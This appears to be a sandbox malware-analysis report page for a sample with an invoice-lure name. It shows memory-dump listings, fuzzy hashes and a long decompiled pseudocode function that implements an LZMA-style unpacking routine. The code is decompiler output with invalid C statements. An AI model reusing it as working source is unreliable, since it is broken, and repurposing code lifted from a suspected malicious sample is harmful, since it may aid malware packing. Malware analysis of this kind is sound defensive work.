0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004067b4
0x0040677d

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406682, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406682() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
